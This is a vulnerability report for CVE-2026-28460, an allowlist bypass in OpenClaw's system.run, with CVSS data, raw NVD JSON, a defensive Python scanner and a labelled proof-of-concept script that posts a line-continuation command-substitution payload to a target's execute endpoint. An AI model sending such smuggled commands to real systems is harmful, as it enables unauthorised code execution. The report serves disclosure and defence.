Security Vulnerability Report
CVE-2026-28460 CVSS 7.1 HIGH

CVE-2026-28460

Published: 2026-03-19 02:16:03
Last Modified: 2026-03-25 15:16:40

Description

OpenClaw versions prior to 2026.2.22 contain an allowlist bypass vulnerability in system.run that allows attackers to execute non-allowlisted commands by splitting a command substitution across a shell line continuation. Attackers can bypass the security analysis by injecting $\ (a dollar sign followed by a single backslash) immediately before a newline and an opening parenthesis inside double quotes: the shell removes the backslash-newline pair before parsing, so text the analyzer treated as harmless is folded into an executable $( command substitution that circumvents the approval boundary.
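
The folding the description relies on, and the check that defeats it, as an added example that is not part of this report or of OpenClaw's code: a small Python scanner that models POSIX shell quoting (backslash-newline is dropped outside single quotes and inside double quotes, and is literal inside single quotes). Run without folding it behaves like a checker that inspects the raw string and lets the split form through; run with folding it sees the same $( the shell will execute and rejects it. The allowlist, the sample commands and the function names are constructed for illustration.

```python
def scan(cmd: str, fold: bool) -> tuple:
    """Walk cmd with shell quoting rules. Returns (text, found): text is cmd
    with backslash-newline pairs removed when fold is True, and found says
    whether an unescaped $( or backtick occurs outside single quotes in
    that text. fold=False models a checker looking at the raw string;
    fold=True models what the shell will actually parse."""
    out, found, i, in_single, in_double = [], False, 0, False, False
    while i < len(cmd):
        ch = cmd[i]
        nxt = cmd[i + 1] if i + 1 < len(cmd) else ""
        if in_single:
            in_single = ch != "'"  # everything but the closing quote is literal
        elif ch == "\\":
            if not (fold and nxt == "\n"):
                out.append(ch + nxt)  # escape pair kept as one unit
            i += 2  # a folded continuation contributes nothing
            continue
        elif ch == "'" and not in_double:
            in_single = True
        elif ch == '"':
            in_double = not in_double
        elif ch == "`" or (ch == "(" and out[-1:] == ["$"]):
            found = True  # "$" then "(" with nothing dropped in between
        out.append(ch)
        i += 1
    return "".join(out), found


def allowed(cmd: str, allowlist: frozenset, fold: bool) -> bool:
    """Command word must be allowlisted and no substitution may be present."""
    text, found = scan(cmd, fold)
    word = text.split()[0] if text.split() else ""
    return word in allowlist and not found


def naive_allowed(cmd: str, allowlist: frozenset) -> bool:
    """Pre-fix style check on the raw text: the split form slips through."""
    return allowed(cmd, allowlist, fold=False)


def safe_to_run(cmd: str, allowlist: frozenset) -> bool:
    """Fold first, then inspect: the split form is rejected."""
    return allowed(cmd, allowlist, fold=True)


ALLOWLIST = frozenset({"echo", "ls"})  # constructed allowlist
SPLIT = 'echo "$\\\n(id)"'  # constructed: $ backslash newline ( inside double quotes
```

A doubled backslash before the newline is an escaped backslash rather than a continuation, so the scanner correctly leaves that case alone.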

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:* - VULNERABLE
OpenClaw < 2026.2.22

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2026-28460 OpenClaw system.run Allowlist Bypass PoC
# This PoC demonstrates bypassing the allowlist using shell line continuation
# Reference: https://www.vulncheck.com/advisories/openclaw-allowlist-bypass-via-shell-line-continuation-command-substitution-in-system-run

import requests

TARGET_URL = "http://target-openclaw-server:8080"
API_KEY = "your_api_key_here"

# Shared by both requests below
HEADERS = {
    "Authorization": f"Bearer {API_KEY}",
    "Content-Type": "application/json",
}


def exploit_allowlist_bypass():
    """
    Exploit the allowlist bypass in OpenClaw's system.run function
    by using shell line continuation characters to split command substitution.
    """
    # Malicious payload using line continuation to bypass allowlist.
    # The $\ followed by a newline and ( causes the shell to fold the line
    # continuation into executable command substitution. In Python source
    # the single shell backslash is written as \\ and the newline as \n.
    malicious_command = '"$\\\n(malicious_command_here)"'

    payload = {
        "action": "system.run",
        "command": malicious_command,
        "args": {"timeout": 30},
    }

    try:
        response = requests.post(
            f"{TARGET_URL}/api/v1/execute",
            headers=HEADERS,
            json=payload,
            timeout=10,
        )
        print(f"Status Code: {response.status_code}")
        print(f"Response: {response.text}")

        if response.status_code == 200:
            result = response.json()
            if result.get("success"):
                print("[+] Allowlist bypass successful! Command executed.")
                return True

        print("[-] Exploitation failed or target not vulnerable")
        return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False


def verify_version():
    """Check if target is running a vulnerable version"""
    try:
        response = requests.get(
            f"{TARGET_URL}/api/v1/version",
            headers=HEADERS,
            timeout=10,
        )
        version = response.json().get("version", "")
        # Vulnerable if version < 2026.2.22
        print(f"[*] Target version: {version}")
        return version
    except (requests.exceptions.RequestException, ValueError):
        # ValueError covers a response body that is not JSON
        return None


if __name__ == "__main__":
    print("[*] CVE-2026-28460 OpenClaw Allowlist Bypass PoC")
    print("[*] Target:", TARGET_URL)
    version = verify_version()
    if version:
        exploit_allowlist_bypass()
```

References

https://github.com/openclaw/openclaw/commit/3f0b9dbb36c86e308267924c0d3d4a4e1fc4d1e9 (Patch)
https://github.com/openclaw/openclaw/security/advisories/GHSA-9868-vxmx-w862 (Mitigation, Vendor Advisory)
https://www.vulncheck.com/advisories/openclaw-allowlist-bypass-via-shell-line-continuation-command-substitution-in-system-run (Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-28460", "sourceIdentifier": "[email protected]", "published": "2026-03-19T02:16:02.603", "lastModified": "2026-03-25T15:16:39.837", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenClaw versions prior to 2026.2.22 contain an allowlist bypass vulnerability in system.run that allows attackers to execute non-allowlisted commands by splitting command substitution using shell line-continuation characters. Attackers can bypass security analysis by injecting $\\\\ followed by a newline and opening parenthesis inside double quotes, causing the shell to fold the line continuation into executable command substitution that circumvents approval boundaries."}, {"lang": "es", "value": "Las versiones de OpenClaw anteriores a la 2026.2.22 contienen una vulnerabilidad de omisión de lista de permitidos en system.run que permite a los atacantes ejecutar comandos no incluidos en la lista de permitidos dividiendo la sustitución de comandos mediante caracteres de continuación de línea de shell. 
Los atacantes pueden eludir el análisis de seguridad inyectando $\\\\ seguido de un salto de línea y un paréntesis de apertura dentro de comillas dobles, haciendo que el shell pliegue la continuación de línea en una sustitución de comandos ejecutable que elude los límites de aprobación."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": 
"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 4.2}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2026.2.22", "matchCriteriaId": "6EA3E555-7328-4665-9FBC-BF4357239EDF"}]}]}], "references": [{"url": "https://github.com/openclaw/openclaw/commit/3f0b9dbb36c86e308267924c0d3d4a4e1fc4d1e9", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-9868-vxmx-w862", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/openclaw-allowlist-bypass-via-shell-line-continuation-command-substitution-in-system-run", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}